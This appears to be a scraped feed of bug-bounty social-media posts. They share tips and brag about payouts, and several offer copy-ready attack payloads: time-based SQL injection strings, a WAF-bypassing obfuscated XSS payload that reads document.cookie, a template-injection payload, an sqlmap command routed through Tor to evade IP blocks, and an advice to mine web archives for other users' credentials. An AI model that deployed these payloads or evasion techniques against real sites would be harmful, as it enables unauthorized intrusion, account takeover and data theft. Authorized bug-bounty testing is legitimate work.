Add to your list
#SQL
#injection
payload
#BugBounty
1%27/**/%256fR/**/50%2521%253D22%253B%2523
==
"0\"XOR(if(now()=sysdate(),sleep(9),0))XOR\"Z",
===
query=login&username=rrr';SELECT PG_SLEEP(5)--&password=rr&submit=Login
==
' AND (SELECT 8871 FROM (SELECT(SLEEP(5)))uZxz)
Bypass XSS WAF and Filters and Akamai
src,svg,autofocus,iframe,img,<> all blok
use this payload add to your list
%22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])](document[%27cooki%27%2B(['e','c','z'][0])]);%22
#BugBounty
#bugbountytip
@safin_mohammed_
6000$ increase to 7 or 8000$
this program paid me 6k, which increased to 7 or 8k after I found SQL injection, XSS, csrf, RCE
I just used two tools,
I will share them soon,
manual testing, for the finding parameters I used two tools coming soon
#bugbountytips
#bugbounty
how I found XSS AND SQL INJECTION
1 I found text.php
2 I used Arjun to find parameters
3 text.Php?m=1'xss and SQL
done, I submitted to h1
#bugbounty
#hackerone
#bugbountytips
SQL Injection
After this, I used ghauri to extract the database It was successful
-11+PROCEDURE+ANALYSE(EXTRACTVALUE(9859,CONCAT(0x5c,(BENCHMARK(110000000,MD5(0x7562756f))))),1)--
#sqlinjection
#ghauri
#bugbounty
#bugbountytips
I found 255 to 300 Bug in one subdomin
The programs paid me 5 digit B
RCE
sql
ATO
all other type of bugs
The program responded once a month, paying $3,700 each month
I found this all in one month and now I've been receiving that money every month for a year 😬
#bugbountytips
We currently have 1,600,000 domains and subdomains on 5 vps
We have also run this command in two ways
It waybacks the whole list one by one and then runs the nuclei
Second
subdomains list+wayback+sqlmap+
You can send billions of requests with
@Arez_1110
#bugbountytips
#bugbount
bypass blocking IP, in sqlmap, i found SQL injection in normal scan my IP was blocked I used tor to send a request and I bypassed this issue
sqlmap -r 1 --time-sec=10 --tor --tor-type=SOCKS5 --check-tor if not work change time-sec or use proxy list
#bugbounty
#bugbountytips
Host header attack on Reset Password Lead to Account takeover and Bypass Redirect on response body
bypass Redirect Host header attack
#bugbounty
#hackerone
#bugbountytips
Client Side Template Injection to XSS
Add to your List 🫡
{{a=toString().constructor.prototype;a.charAt=a.trim;$eval(%27a,alert(1),a%27)}}
#bugbounty
#bugbountytip
Yay, I was awarded a $3100 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
the first time I submitted an xss like this
><script>alert(1)</script> I bypassed JSON response
second, after the fixed bug, I found a bypass with its payload
#BugBounty
#bugtips
I wrote these two scripts for a private program to produce a bug. I succeeded and received more than $1,000
brute-force directory work-with-multithreading
check url list via cookies and Authorization
+
#bugbountytips
#bugbounty
I used Burp Bounty Pro and Burp scanner and manually couldn't bypass this xss but I used
@KN0X55
it bypassed. this is not ads for KNOX but it's very cool I like supporting this man
#BugBounty
#hackerone
#BugBounty
Happy to cross 5000 reputation points
today, I was awarded more than 22 Triaged. and bounty
I submitted SQL injection,XSS.csrf.clickjacking, ATO, RCE The program paid me $10,000
#hackerone
@Hacker0x01
#BugBounty
#bugbountytips
How this tool work?
1) Enumeration all target subdomain.
2) All subdomain test with httpx to find live domain.
3) All subdomain tested one by one with nuclei to find a vulnerability.
4 in comment
#bug
#bugbountytips
#BugBounty
1/1
Bypass Authorization Login into the Admin panel
1 download appe.exe and install it for windows
2 capture requests i used fiddler
3 update your profile the app sends a request to the server via the admin account i don't know why
#bugbountytips
#BugBounty
Do I have the skills for a
#CTF
?”
We have several different types of CTF you can try yourself
Web Exploitation (WebSec)
, Binary Exploitation (Pwn)
, Cryptography (Crypto)
, Reverse Engineering (Reversing)
, Forensics
, Mobile Security (Mobile)
url:
It's a very good program He quickly gave me a $4,300 bounty
ATO + html injection
If the website sends a request via GET username and password , directly search for another user and pass in web archive
#bugbounty
#bugbountytips
#bb
#hackerone
I have found Local File Inclusion (LFI) in this PHP
1 first I found PHP files
2 I found the params
3 download. php?file=../.
<?php
$filename = basename($_GET['file']);
// Specify file path.
$path = ''; // '/uplods/'
$download_file = $path.$filename;
#BugBounty
#bugbountytip
For those who are new to bug bounty, you can use this tool It makes it easy for you. We have combined most of the tools into one tool
#bugbounty
#bugbountytips
If you have a bounty program you like hacking on then try out the - we will return any data on the subdomains/services we have indexed and if we don't have the data we will go out and fetch it for you with an email notification when done.
after I submitted (Server-side template injection) and i got a duplicate 1000$ I lost it
Then I was upset
after that, I spend 2 days and found a ton of bug
Bypass Authorization Login into Admin panel
Server-side template injection -4-
RXSS -5-
Sql Injection -3-3
#BugBounty
I reached the 10000 Reputation Milestone and thought they would send me a plane of swag
I had told all my friends to be present that day because there were so many swags I couldn't carry
#hackerone
new version coming soon,
In this version you will be able to enumeration subdomains by using a list of domains or single domains, and more all in one
#bugbounty
#bugbountytip
#hackerone
On 30/08/2023 a new scope was added to the program I reported 14 bugs, sql injection, XSS, and on 31/08/2023 The program was closed [Out of scope]
#bugbounty
#hackerone